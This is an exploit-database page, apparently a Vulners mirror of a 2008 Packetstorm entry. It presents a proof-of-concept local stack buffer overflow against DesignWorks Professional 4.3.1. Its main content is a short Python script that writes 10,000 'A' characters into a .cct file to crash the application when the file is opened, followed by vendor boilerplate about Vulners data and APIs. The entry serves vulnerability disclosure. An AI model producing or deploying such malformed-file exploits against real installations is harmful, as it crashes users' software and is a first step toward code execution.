Lucene search
K

DesignWorks Professional 4.3.1 Overflow

🗓️ 08 Dec 2008 00:00:00Reported by Cn4phuxType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

DesignWorks Professional 4.3.1 Overflow Local .CCT File Stack Buffer Overflow (PoC) by Cn4phu

Code
`#  
# I'm Cn4phux  
# ------ | ______ _____ (--, __*__ ______  
# |____| | ¤ | | | | ! ) | | |  
# [ | |` | | <> | |-----> |__/ | | ¤ | ]  
# | .. | |____! |____| |____ |\ | |-----|  
# | _| \ ----- | ::: |  
# | | \  
# |_____| | \  
# |  
# |  
# ,|.  
# / | \  
# | | |  
# | _ |  
# `._\/.\/_,'  
# _( 8 )_  
# / '_ _' \  
# | /{_}\ |  
# ` | " | `  
# | |  
#  
#  
# [+] Application : DesignWorks Professional 4.3.1  
#  
# [+] Application's Description : (" DesignWorks Professional Schematic Capture for Windows...,Google-it.)  
#  
# [+] Bug : Local .CCT File Stack Buffer Overflow (PoC)  
#  
# [+] Author : Cn4phux  
#  
import sys  
import os  
print "[x] Local Stack Overflow PoC"  
try:  
milef = open("x2.cct",'w')  
  
except IOError, e:  
print "Unable to open file ", e  
sys.exit(0)  
print "[x] File sucessfully opened for writing."  
try:  
milef.write("A" * 10000)  
except IOError, e:  
  
print "Unable to write to file ", e  
sys.exit(0)  
  
print "[x] Exploit successfully written."  
milef.close()  
print "[x] ."  
print "\n[x] Cn4phux made in DZ, Great'z to all Algerians. /Google.dz"  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Dec 2008 00:00Current
0.8Low risk
Vulners AI Score0.8
18